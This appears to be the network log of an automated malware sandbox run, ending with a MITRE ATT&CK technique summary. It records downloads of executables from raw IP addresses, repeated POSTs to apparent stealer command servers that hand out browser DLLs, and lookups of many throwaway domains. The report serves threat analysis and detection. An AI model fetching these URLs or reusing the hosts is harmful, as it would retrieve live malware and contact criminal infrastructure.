4.1kB 173.0kB 88 131
HTTP Request
GET http://185.172.128.59/ISetup8.exe
HTTP Response
200
-
3.1kB 171.8kB 68 123
-
276 B 5.3kB 6 6
-
8.7kB 215.3kB 186 157
-
98.2kB 5.3MB 2069 3772
HTTP Response
200
-
34.117.186.192:443 https://ipinfo.io/widget/demo/191.101.209.39 tls, http smyDlk5Es9ywvt8vYzqP4xsg.exe 891 B 3.8kB 8 8
HTTP Request
GET https://ipinfo.io/widget/demo/191.101.209.39
-
92 B 80 B 2 2
-
3.80.150.121:443 https://service-domain.xyz/google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0 tls, http CotgOgQ.exe 993 B 4.2kB 11 9
HTTP Request
GET https://service-domain.xyz/google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0
HTTP Response
200
-
3.80.150.121:443 https://service-domain.xyz/google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7 tls, http FhZPPvs.exe 991 B 4.2kB 11 9
HTTP Request
GET https://service-domain.xyz/google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7
HTTP Response
200
-
172.217.16.238:443 https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVx tls, http CotgOgQ.exe 1.3kB 9.0kB 15 12
HTTP Request
GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVx
HTTP Response
302
-
172.217.16.238:443 https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzB tls, http FhZPPvs.exe 1.3kB 9.0kB 15 12
HTTP Request
GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzB
HTTP Response
302
-
216.58.201.97:443 https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx tls, http CotgOgQ.exe 2.2kB 37.9kB 35 31
HTTP Request
GET https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
HTTP Response
200
-
216.58.201.97:443https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxtls, httpFhZPPvs.exe2.2kB 37.9kB 35 31
HTTP Request
GET https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxHTTP Response
200 -
92 B 80 B 2 2
-
1.3kB 576 B 6 4
HTTP Request
POST http://api3.check-data.xyz/api2/google_api_ifiHTTP Response
200 -
185.172.128.90:80http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0httpb1nbwn523WEOir6D5RHSIeEr.exe389 B 280 B 4 3
HTTP Request
GET http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0HTTP Response
200 -
375 B 279 B 4 3
HTTP Request
GET http://185.172.128.228/ping.php?substr=fiveHTTP Response
200 -
5.4kB 290.2kB 113 220
HTTP Request
GET http://185.172.128.59/syncUpd.exeHTTP Response
200 -
119.1kB 5.0MB 2396 3752
HTTP Request
GET http://185.172.128.228/BroomSetup.exeHTTP Response
200 -
836 B 721 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
185.93.2.246:443https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exetls, httpBITS2.4MB 54.0MB 35066 38807
HTTP Request
HEAD https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
200HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
206HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
206HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
206HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
206HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Response
206HTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeHTTP Request
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe -
-
-
836 B 657 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
-
20.9.155.145:443https://westus2-2.in.applicationinsights.azure.com/v2/tracktls, httpSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe2.0kB 5.2kB 11 10
HTTP Request
POST https://westus2-2.in.applicationinsights.azure.com/v2/trackHTTP Response
200 -
92 B 40 B 2 1
-
92 B 40 B 2 1
-
390 B 280 B 4 3
HTTP Request
GET http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0HTTP Response
200 -
428 B 279 B 5 3
HTTP Request
GET http://185.172.128.228/ping.php?substr=eightHTTP Response
200 -
5.5kB 290.2kB 115 222
HTTP Request
GET http://185.172.128.59/syncUpd.exeHTTP Response
200 -
92.1kB 5.0MB 1973 3747
HTTP Request
GET http://185.172.128.228/BroomSetup.exeHTTP Response
200 -
836 B 721 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
836 B 657 B 6 6
HTTP Request
POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashxHTTP Response
200 -
4.5MB 5.5MB 7315 5490
HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dllHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dllHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dllHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dllHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dllHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dllHTTP Response
200HTTP Request
GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dllHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200 -
788 B 667 B 7 6
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.phpHTTP Response
200 -
649 B 343 B 5 3
HTTP Request
POST http://185.172.128.150/c698e1bc8a2f5e6d.phpHTTP Response
200 -
738 B 557 B 6 4
HTTP Request
POST http://185.172.128.19/ghsdh39s/index.phpHTTP Response
200HTTP Request
POST http://185.172.128.19/ghsdh39s/index.phpHTTP Response
200 -
1.1kB 4.4kB 11 12
-
1.9kB 5.9kB 15 16
-
104.1kB 2.3MB 1728 1711
-
73 B 128 B 1 1
DNS Request
56.132.233.193.in-addr.arpa
-
68 B 100 B 1 1
DNS Request
affordcharmcropwo.shop
DNS Response
104.21.67.211172.67.181.34
-
69 B 101 B 1 1
DNS Request
cleartotalfisherwo.shop
DNS Response
104.21.72.132172.67.185.32
-
68 B 100 B 1 1
DNS Request
worryfillvolcawoi.shop
DNS Response
104.21.44.125172.67.199.191
-
72 B 134 B 1 1
DNS Request
211.67.21.104.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
80.121.18.2.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
132.72.21.104.in-addr.arpa
-
69 B 101 B 1 1
DNS Request
enthusiasimtitleow.shop
DNS Response
172.67.183.226104.21.18.233
-
73 B 105 B 1 1
DNS Request
dismissalcylinderhostw.shop
DNS Response
104.21.22.160172.67.205.132
-
72 B 134 B 1 1
DNS Request
125.44.21.104.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
226.183.67.172.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
160.22.21.104.in-addr.arpa
-
71 B 103 B 1 1
DNS Request
diskretainvigorousiw.shop
DNS Response
104.21.23.143172.67.211.165
-
71 B 103 B 1 1
DNS Request
communicationgenerwo.shop
DNS Response
172.67.166.251104.21.83.19
-
73 B 133 B 1 1
DNS Request
67.113.215.185.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
143.23.21.104.in-addr.arpa
-
68 B 100 B 1 1
DNS Request
pillowbrocccolipe.shop
DNS Response
104.21.47.56172.67.144.218
-
71 B 133 B 1 1
DNS Request
56.47.21.104.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
251.166.67.172.in-addr.arpa
-
74 B 129 B 1 1
DNS Request
234.132.233.193.in-addr.arpa
-
69 B 101 B 1 1
DNS Request
zippyfinickysofwps.shop
DNS Response
104.21.39.216172.67.148.231
-
52 B 84 B 1 1
DNS Request
yip.su
DNS Response
104.21.79.77172.67.169.89
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
104.20.4.235172.67.19.24104.20.3.235
-
69 B 101 B 1 1
DNS Request
acceptabledcooeprs.shop
DNS Response
172.67.180.137104.21.59.156
-
72 B 134 B 1 1
DNS Request
216.39.21.104.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
235.4.20.104.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
77.79.21.104.in-addr.arpa
-
62 B 94 B 1 1
DNS Request
onlycitylink.com
DNS Response
104.21.18.166172.67.182.192
-
60 B 92 B 1 1
DNS Request
realdeepai.org
DNS Response
172.67.193.79104.21.90.14
-
55 B 215 B 1 1
DNS Request
nic-it.nl
DNS Response
189.232.19.193189.181.37.206190.146.112.188123.212.43.225187.225.176.41109.98.58.98186.112.12.58217.219.131.81186.182.55.44187.134.46.246
-
69 B 101 B 1 1
DNS Request
obsceneclassyjuwks.shop
DNS Response
172.67.192.5104.21.20.88
-
61 B 93 B 1 1
DNS Request
jonathantwo.com
DNS Response
104.21.31.124172.67.176.131
-
62 B 94 B 1 1
DNS Request
firstfirecar.com
DNS Response
104.21.60.76172.67.193.220
-
68 B 100 B 1 1
DNS Request
sweetsquarediaslw.shop
DNS Response
172.67.203.170104.21.44.201
-
69 B 129 B 1 1
DNS Request
67.65.42.5.in-addr.arpa
-
62 B 94 B 1 1
DNS Request
junglethomas.com
DNS Response
104.21.92.190172.67.197.33
-
71 B 1
DNS Response
34.117.186.192
-
71 B 111 B 1 1
DNS Request
26.56.192.85.in-addr.arpa
-
70 B 1
DNS Request
59.8.26.104.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
-
64 B 80 B 1 1
DNS Request
service-domain.xyz
DNS Response
3.80.150.121
-
70 B 133 B 1 1
DNS Request
11.97.55.23.in-addr.arpa
-
71 B 125 B 1 1
DNS Request
121.150.80.3.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
80.190.18.2.in-addr.arpa
-
65 B 105 B 1 1
DNS Request
clients2.google.com
DNS Response
172.217.16.238
-
73 B 112 B 1 1
DNS Request
10.200.250.142.in-addr.arpa
-
76 B 121 B 1 1
DNS Request
clients2.googleusercontent.com
DNS Response
216.58.201.97
-
73 B 142 B 1 1
DNS Request
238.16.217.172.in-addr.arpa
-
72 B 169 B 1 1
DNS Request
97.201.58.216.in-addr.arpa
-
65 B 159 B 1 1
DNS Request
api3.check-data.xyz
DNS Response
44.231.33.22835.82.94.151
-
72 B 135 B 1 1
DNS Request
228.33.231.44.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
73 B 73 B 1 1
DNS Request
90.128.172.185.in-addr.arpa
-
74 B 74 B 1 1
DNS Request
228.128.172.185.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
svc.iolo.com
DNS Response
20.157.87.45
-
71 B 157 B 1 1
DNS Request
45.87.157.20.in-addr.arpa
-
63 B 105 B 1 1
DNS Request
download.iolo.net
DNS Response
185.93.2.246
-
71 B 112 B 1 1
DNS Request
246.2.93.185.in-addr.arpa
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
8.8.8.8:53westus2-2.in.applicationinsights.azure.comdnsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe88 B 299 B 1 1
DNS Request
westus2-2.in.applicationinsights.azure.com
DNS Response
20.9.155.145
-
71 B 157 B 1 1
DNS Request
145.155.9.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
5.173.189.20.in-addr.arpa
-
-
-
-
-
-
-
-
-
-
74 B 74 B 1 1
DNS Request
150.128.172.185.in-addr.arpa
-
106 B 179 B 1 1
DNS Request
97840b67-4dbf-4556-8dde-3dd830aa81a5.uuid.filesdumpplace.org
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.130.233162.159.135.233162.159.129.233162.159.134.233162.159.133.233
-
72 B 88 B 1 1
DNS Request
server9.filesdumpplace.org
DNS Response
185.82.216.96
-
61 B 96 B 1 1
DNS Request
stun.ipfire.org
DNS Response
81.3.27.44
-
48 B 80 B 1 1
-
64 B 96 B 1 1
DNS Request
carsalessystem.com
DNS Response
172.67.221.71104.21.94.82
-
74 B 136 B 1 1
DNS Request
233.130.159.162.in-addr.arpa
-
69 B 98 B 1 1
DNS Request
44.27.3.81.in-addr.arpa
-
72 B 135 B 1 1
DNS Request
96.216.82.185.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
71.221.67.172.in-addr.arpa
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
  System Services (1)
    Service Execution (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (3)
    Windows Service (3)
  Scheduled Task/Job (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (3)
    Windows Service (3)
  Scheduled Task/Job (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (5)
    Disable or Modify System Firewall (1)
    Disable or Modify Tools (3)
  Modify Registry (7)
  Subvert Trust Controls (1)
    Install Root Certificate (1)
  Virtualization/Sandbox Evasion (2)
Credential Access
  Unsecured Credentials (5)
    Credentials In Files (4)
    Credentials in Registry (1)
Downloads